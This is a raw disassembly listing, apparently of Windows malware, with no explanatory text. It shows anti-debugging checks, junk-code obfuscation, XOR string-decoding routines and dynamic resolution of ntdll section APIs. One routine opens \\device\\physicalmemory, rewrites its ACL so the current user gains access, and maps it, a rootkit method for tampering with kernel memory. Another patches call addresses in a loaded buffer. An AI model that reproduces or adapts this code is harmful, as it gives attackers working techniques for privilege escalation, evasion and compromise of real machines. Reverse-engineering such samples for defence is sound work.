mov eax, dword_43B2AC
add eax, esi
mov byte ptr ds:dword_410850[eax], 0
mov edi, dword_43B2AC
mov eax, edi
add eax, 3
add eax, esi
mov dword_43B2AC, eax
cmp eax, 0DBBh
jle short loc_401B90
and dword_43B2AC, 0
loc_401B90: ; CODE XREF: .text:00401B87�j
lea eax, dword_410850[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B9A proc near ; CODE XREF: sub_405601+66A�p
; sub_409847+D36�p
var_A = byte ptr -0Ah
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_2], 4231h
inc [ebp+var_2]
mov ebx, [ebp+arg_4]
jmp short loc_401C0E
; ---------------------------------------------------------------------------
loc_401BB7: ; CODE XREF: sub_401B9A+7B�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401C0D
lea edi, [ebp+var_A]
lea esi, aRrQa ; "rr/+Q"
mov ecx, 7
rep movsb
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx
mov edx, [ebp+arg_0]
add edx, eax
push edx
push [ebp+arg_8]
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_3], 0DEh
movzx eax, [ebp+var_3]
imul eax, 6325h
mov [ebp+var_3], al
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C0D: ; CODE XREF: sub_401B9A+24�j
inc ebx
loc_401C0E: ; CODE XREF: sub_401B9A+1B�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401BB7
cmp [ebp+arg_4], 0
jz short loc_401C43
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C43
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401C43
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C43: ; CODE XREF: sub_401B9A+81�j
; sub_401B9A+8A�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_40C73C ; lstrlen
mov ebx, eax
or ebx, ebx
jz short loc_401C7C
call sub_40C5A4 ; GetVersion
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+arg_8]
call sub_40C4B8
mov word ptr [ebp-4], 33AEh
sub word ptr [ebp-4], 32B9h
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C7C: ; CODE XREF: sub_401B9A+B9�j
xor eax, eax
loc_401C7E: ; CODE XREF: sub_401B9A+71�j
; sub_401B9A+A7�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401B9A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2C0
lea eax, ds:436120h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401CC3
; ---------------------------------------------------------------------------
loc_401CA9: ; CODE XREF: .text:00401CC5�j
mov eax, dword_43B2C0
add eax, edi
lea eax, ds:436120h[eax]
movsx edx, byte ptr [eax]
xor edx, 0A7h
mov [eax], dl
inc edi
loc_401CC3: ; CODE XREF: .text:00401CA7�j
cmp edi, esi
jl short loc_401CA9
mov eax, dword_43B2C0
add eax, esi
mov byte ptr ds:dword_436120[eax], 0
xor edi, edi
mov edi, dword_43B2C0
mov eax, edi
add eax, 3
add eax, esi
mov dword_43B2C0, eax
inc dword_43B2C0
cmp dword_43B2C0, 0DC7h
jle short loc_401D03
and dword_43B2C0, 0
loc_401D03: ; CODE XREF: .text:00401CFA�j
mov dword ptr [ebp-4], 347h
lea eax, dword_436120[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D14 proc near ; CODE XREF: sub_4028A6+5D�p
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_B = byte ptr -0Bh
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_1], 60h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
inc dword_43B228
mov [ebp+var_4], 1DB7h
movzx eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_4], ax
mov ebx, [ebp+arg_0]
and ds:dword_40E00C, 0
and ds:dword_41DA70, 0
and ds:dword_41DA88, 0
and ds:dword_40F268, 0
mov ds:dword_41A860, 4
mov ds:dword_413F84, 4
loc_401D7B: ; CODE XREF: sub_401D14+154�j
; sub_401D14+175�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_413F80, al
movzx eax, ds:byte_413F80
or eax, eax
jl loc_40200C
cmp eax, 0FFh
jg loc_40200C
jmp off_43B2D4[eax*4]
; ---------------------------------------------------------------------------
lea edi, [ebp+var_19]
lea esi, aL2r6_ ; "l2r-6;."
movsd
movsd
loc_401DB1: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
or byte ptr ds:dword_41DA70, 40h
lea edi, [ebp+var_1A]
lea esi, byte_43B2CC
xor ecx, ecx
inc ecx
rep movsb
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401DD1: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_20], eax
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401DEC: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
or byte ptr ds:dword_41DA70, 40h
test byte ptr [ebx], 38h
jnz loc_40200C
call sub_40C598 ; GetTickCount
loc_401E01: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B2E4�o ...
test ds:byte_413F80, 1
jz short loc_401E1A
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401D14+F4�j
inc ds:dword_41DA88
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401E25: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
inc ds:dword_41DA88
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401E36: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B36C�o ...
test byte ptr ds:dword_41DA70, 10h
jz short loc_401E46
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E46: ; CODE XREF: sub_401D14+129�j
mov [ebp+var_11], 7Dh
movzx eax, [ebp+var_11]
imul eax, 46DCh
mov [ebp+var_11], al
or byte ptr ds:dword_41DA70, 10h
mov al, ds:byte_413F80
mov ds:byte_40F274, al
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401E6D: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
test byte ptr ds:dword_41DA70, 4
jz short loc_401E7D
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E7D: ; CODE XREF: sub_401D14+160�j
call sub_40C5A4 ; GetVersion
or byte ptr ds:dword_41DA70, 4
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401E8E: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
test byte ptr ds:dword_41DA70, 8
jz short loc_401E9E
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401D14+181�j
call sub_40C538 ; RtlGetLastWin32Error
or byte ptr ds:dword_41DA70, 8
mov al, ds:byte_413F80
mov ds:byte_41EB80, al
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401EB9: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B46C�o
test byte ptr ds:dword_41DA70, 1
jz short loc_401EC9
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401EC9: ; CODE XREF: sub_401D14+1AC�j
call sub_40C598 ; GetTickCount
or byte ptr ds:dword_41DA70, 1
mov ds:dword_41A860, 2
jmp loc_401D7B
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B470�o
test byte ptr ds:dword_41DA70, 2
jz short loc_401EF4
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401EF4: ; CODE XREF: sub_401D14+1D7�j
or byte ptr ds:dword_41DA70, 2
mov ds:dword_413F84, 2
jmp loc_401D7B
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401F10: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
inc ds:dword_41DA88
or byte ptr ds:dword_41DA70, 40h
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F22: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
or byte ptr ds:dword_41DA70, 40h
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F39: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add eax, 2
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F4C: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_413F84
add ds:dword_40F268, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F5C: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401F72: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
add ds:dword_41DA88, 2
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F7E: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
add ds:dword_41DA88, 3
jmp loc_40200C
; ---------------------------------------------------------------------------
loc_401F8A: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+2B3�j
; DATA XREF: ...
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_401F91: ; CODE XREF: sub_401D14+8B�j
; DATA XREF: .data:0043B310�o
or byte ptr ds:dword_41DA70, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42EB90, al
movzx eax, ds:byte_42EB90
or eax, eax
jl short loc_402005
cmp eax, 0Bh
jg short loc_401FB9
jmp off_43B6D4[eax*4]
; ---------------------------------------------------------------------------
loc_401FB9: ; CODE XREF: sub_401D14+29C�j
cmp eax, 80h
jl short loc_402005
cmp eax, 0CFh
jg short loc_402005
jmp off_43B504[eax*4]
; ---------------------------------------------------------------------------
call sub_40C514 ; GetCurrentThreadId
loc_401FD3: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
or byte ptr ds:dword_41DA70, 40h
call sub_40C514 ; GetCurrentThreadId
jmp short loc_40200C
; ---------------------------------------------------------------------------
inc dword_43B228
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401FE9: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
mov eax, ds:dword_41A860
add ds:dword_41DA88, eax
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_401FF6: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+29E�j ...
inc ds:dword_41DA88
or byte ptr ds:dword_41DA70, 40h
jmp short loc_40200C
; ---------------------------------------------------------------------------
loc_402005: ; CODE XREF: sub_401D14+8B�j
; sub_401D14+297�j ...
xor eax, eax
jmp loc_402199
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401D14+7A�j
; sub_401D14+85�j ...
inc dword_43B228
test byte ptr ds:dword_41DA70, 40h
jz loc_40211A
call sub_40C538 ; RtlGetLastWin32Error
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FCFC, al
call sub_40C598 ; GetTickCount
movzx eax, ds:byte_42FCFC
and eax, 0C0h
mov [ebp+var_11], al
movzx eax, ds:byte_42FCFC
and eax, 7
mov [ebp+var_12], al
movzx eax, [ebp+var_11]
cmp eax, 0C0h
jz loc_40211A
mov [ebp+var_13], 0A5h
movzx eax, [ebp+var_13]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_13], al
cmp [ebp+var_11], 40h
jnz short loc_40207B
inc ds:dword_40F268
loc_40207B: ; CODE XREF: sub_401D14+35F�j
call sub_40C514 ; GetCurrentThreadId
movzx eax, [ebp+var_11]
cmp eax, 80h
jnz short loc_402096
mov eax, ds:dword_413F84
add ds:dword_40F268, eax
loc_402096: ; CODE XREF: sub_401D14+375�j
mov [ebp+var_18], 4587h
mov eax, [ebp+var_18]
mov edx, eax
add edx, eax
mov [ebp+var_18], edx
cmp ds:dword_413F84, 2
jnz short loc_4020CA
call sub_40C508 ; GetCurrentProcessId
cmp [ebp+var_11], 0
jnz short loc_40211A
cmp [ebp+var_12], 6
jnz short loc_40211A
add ds:dword_40F268, 2
jmp short loc_40211A
; ---------------------------------------------------------------------------
loc_4020CA: ; CODE XREF: sub_401D14+39A�j
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_12], 4
jnz short loc_402102
mov dword ptr [ebp-1Ch], 2A45h
inc dword ptr [ebp-1Ch]
or byte ptr ds:dword_41DA70, 80h
call sub_40C514 ; GetCurrentThreadId
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41A85C, al
movzx eax, ds:byte_41A85C
and eax, 7
mov [ebp+var_12], al
loc_402102: ; CODE XREF: sub_401D14+3BF�j
cmp [ebp+var_12], 5
jnz short loc_402115
cmp [ebp+var_11], 0
jnz short loc_402115
add ds:dword_40F268, 4
loc_402115: ; CODE XREF: sub_401D14+3F2�j
; sub_401D14+3F8�j
call sub_40C5A4 ; GetVersion
loc_40211A: ; CODE XREF: sub_401D14+305�j
; sub_401D14+344�j ...
and ds:dword_40F26C, 0
jmp short loc_40213B
; ---------------------------------------------------------------------------
loc_402123: ; CODE XREF: sub_401D14+432�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F26C
mov al, [eax]
mov ds:byte_413F78[edx], al
inc ds:dword_40F26C
loc_40213B: ; CODE XREF: sub_401D14+40D�j
mov eax, ds:dword_40F268
cmp ds:dword_40F26C, eax
jb short loc_402123
lea edi, [ebp+var_B]
lea esi, aF50z ; "F 5 0z"
mov ecx, 7
rep movsb
and ds:dword_40F26C, 0
jmp short loc_402179
; ---------------------------------------------------------------------------
loc_402161: ; CODE XREF: sub_401D14+470�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F26C
mov al, [eax]
mov ds:byte_439330[edx], al
inc ds:dword_40F26C
loc_402179: ; CODE XREF: sub_401D14+44B�j
mov eax, ds:dword_41DA88
cmp ds:dword_40F26C, eax
jb short loc_402161
inc dword_43B228
mov eax, ebx
sub eax, [ebp+arg_0]
mov ds:dword_40E00C, eax
xor eax, eax
inc eax
loc_402199: ; CODE XREF: sub_401D14+12D�j
; sub_401D14+164�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401D14 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 1F7h
push esi
push dword ptr [ebp+8]
mov eax, dword_43BF3C
lea eax, ds:417640h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4021E7
; ---------------------------------------------------------------------------
loc_4021CD: ; CODE XREF: .text:004021E9�j
mov eax, dword_43BF3C
add eax, edi
lea eax, ds:417640h[eax]
movsx edx, byte ptr [eax]
xor edx, 88h
mov [eax], dl
inc edi
loc_4021E7: ; CODE XREF: .text:004021CB�j
cmp edi, esi
jl short loc_4021CD
mov dword ptr [ebp-8], 182h
mov eax, dword_43BF3C
add eax, esi
mov byte ptr ds:dword_417640[eax], 0
xor edi, edi
mov edi, dword_43BF3C
add dword_43BF3C, 3
mov eax, dword_43BF3C
inc eax
add eax, esi
mov dword_43BF3C, eax
cmp eax, 0E06h
jle short loc_40222B
and dword_43BF3C, 0
loc_40222B: ; CODE XREF: .text:00402222�j
mov dword ptr [ebp-0Ch], 1D5h
lea eax, dword_417640[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40223C proc near ; CODE XREF: sub_402A4D+1E�p
var_A = byte ptr -0Ah
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C550 ; GetModuleHandleA
mov ebx, eax
lea edi, [ebp+var_A]
lea esi, aA_utc2 ; "_utc*2"
movsd
movsd
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_42FCF4, eax
call sub_40C634 ; IsDebuggerPresent
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41C954, eax
call sub_40C538 ; RtlGetLastWin32Error
push offset aNtopensection ; "NtOpenSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41A868, eax
mov [ebp+var_2], 2FA0h
sub [ebp+var_2], 63DAh
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_41DA80, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push ebx
call sub_40C568 ; GetProcAddress
mov ds:dword_42FCF0, eax
pop edi
pop esi
pop ebx
leave
retn
sub_40223C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022CC proc near ; CODE XREF: sub_402A4D+16A�p
var_88 = byte ptr -88h
var_81 = byte ptr -81h
var_79 = dword ptr -79h
var_75 = byte ptr -75h
var_6D = byte ptr -6Dh
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_58 = byte ptr -58h
var_57 = byte ptr -57h
var_56 = word ptr -56h
var_53 = byte ptr -53h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
mov [ebp+var_53], 0B5h
movzx eax, [ebp+var_53]
imul eax, 5810h
mov [ebp+var_53], al
lea edi, [ebp+var_6D]
lea esi, aHgtr ; "hgtr"
mov ecx, 5
rep movsb
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_60]
push eax
call ds:dword_42FCF4
lea edi, [ebp+var_75]
lea esi, aQOkgoj ; "Q!okgOJ"
movsd
movsd
mov [ebp+var_18], 18h
and [ebp+var_14], 0
lea eax, [ebp+var_60]
mov [ebp+var_10], eax
call sub_40C514 ; GetCurrentThreadId
mov [ebp+var_C], 40h
mov eax, dword_43C00F
mov [ebp+var_79], eax
and [ebp+var_8], 0
call sub_40C508 ; GetCurrentProcessId
and [ebp+var_4], 0
mov [ebp+var_56], 58E2h
inc [ebp+var_56]
and [ebp+var_30], 0
mov [ebp+var_52], 721Bh
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52], ax
and [ebp+var_2C], 0
lea edi, [ebp+var_81]
lea esi, aXghyb_v ; "Xhyb."
mov ecx, 2
rep movsd
mov [ebp+var_28], 1
mov [ebp+var_57], 71h
sub [ebp+var_57], 0F4h
mov [ebp+var_24], 1
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
mov [ebp+var_50], 2
call sub_40C634 ; DATA XREF: sub_43F401+2F�o
mov [ebp+var_4C], 1
call sub_40C514 ; GetCurrentThreadId
and [ebp+var_48], 0
mov [ebp+var_58], 74h
add [ebp+var_58], 1
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A868
mov ebx, 762Dh
inc ebx
lea eax, [ebp+var_88]
push eax
push 0
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C958 ; GetSecurityInfo
call sub_40C5A4 ; GetVersion
lea eax, [ebp+var_68]
push eax
push [ebp+var_64]
lea eax, [ebp+var_50]
push eax
mov eax, 0Bh
sub eax, dword_43BF38
push eax
call sub_40C970 ; SetEntriesInAclA
call sub_40C514 ; GetCurrentThreadId
push 0
push [ebp+var_68]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C964 ; SetSecurityInfo
push [ebp+var_1C]
call sub_40C55C ; CloseHandle
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A868
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
leave
retn
sub_4022CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402465 proc near ; CODE XREF: sub_402A4D+265�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
and [ebp+var_8], 0
call sub_40C598 ; GetTickCount
mov eax, [ebp+var_C]
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_14], eax
call sub_40C514 ; GetCurrentThreadId
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41DA80
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_8]
leave
retn
sub_402465 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024C1 proc near ; CODE XREF: sub_402A4D+36A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C598 ; GetTickCount
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41C954
call sub_40C508 ; GetCurrentProcessId
pop ebp
retn
sub_4024C1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 8Bh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C024
lea eax, ds:412DE0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_402520
; ---------------------------------------------------------------------------
loc_402509: ; CODE XREF: .text:00402522�j
mov eax, dword_43C024
add eax, edi
lea eax, ds:412DE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 42h
mov [eax], dl
inc edi
loc_402520: ; CODE XREF: .text:00402507�j
cmp edi, esi
jl short loc_402509
mov dword ptr [ebp-8], 15Eh
mov eax, dword_43C024
add eax, esi
mov byte ptr ds:dword_412DE0[eax], 0
xor edi, edi
mov edi, dword_43C024
mov eax, edi
add eax, 5
add eax, esi
mov dword_43C024, eax
add dword_43C024, 2
cmp dword_43C024, 0DF6h
jle short loc_402568
and dword_43C024, 0
loc_402568: ; CODE XREF: .text:0040255F�j
lea eax, dword_412DE0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402572 proc near ; CODE XREF: sub_4028A6+19A�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_4], 6A0Dh
mov eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov [ebp+var_4], edx
xor ebx, ebx
loc_40258E: ; CODE XREF: sub_402572+329�j
mov [ebp+var_8], 0A92h
movzx eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_8], ax
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4025E8
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4025E8
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_4028A1
loc_4025E8: ; CODE XREF: sub_402572+3D�j
; sub_402572+4A�j ...
mov [ebp+var_A], 143Ah
movzx eax, [ebp+var_A]
imul eax, 5B68h
mov [ebp+var_A], ax
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
call sub_40C514 ; GetCurrentThreadId
mov [ebp+var_5], 0
loc_402618: ; CODE XREF: sub_402572+1B2�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_5]
imul edx, 0Ch
movzx edx, byte_43C0B4[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_40270A
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz loc_40270A
mov [ebp+var_C], 184h
movzx eax, [ebp+var_C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_C], ax
movzx eax, [ebp+var_5]
imul eax, 0Ch
push off_43C0BC[eax]
call sub_40C550 ; GetModuleHandleA
movzx edi, [ebp+var_5]
imul edi, 0Ch
push off_43C0B8[edi]
push eax
call sub_40C568 ; GetProcAddress
mov [ebp+var_18], eax
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_18]
sub eax, 4
mov [ebp+var_1C], eax
mov [ebp+var_E], 1041h
sub [ebp+var_E], 73D6h
mov eax, [ebp+arg_4]
mov edx, ecx
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_1C]
mov ds:1[eax], edx
mov [ebp+var_14], 4B75h
add [ebp+var_14], 37C2h
jmp short loc_402729
; ---------------------------------------------------------------------------
loc_40270A: ; CODE XREF: sub_402572+BE�j
; sub_402572+CD�j ...
movzx eax, [ebp+var_5]
imul eax, 0Ch
cmp off_43C0B8[eax], 0
jz short loc_402729
call sub_40C538 ; RtlGetLastWin32Error
add [ebp+var_5], 1
jmp loc_402618
; ---------------------------------------------------------------------------
loc_402729: ; CODE XREF: sub_402572+196�j
; sub_402572+1A7�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402798
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402798
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_402772
cmp edx, 0BEh
jz short loc_402772
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402798
loc_402772: ; CODE XREF: sub_402572+1EB�j
; sub_402572+1F3�j
mov [ebp+var_C], 53AEh
inc [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
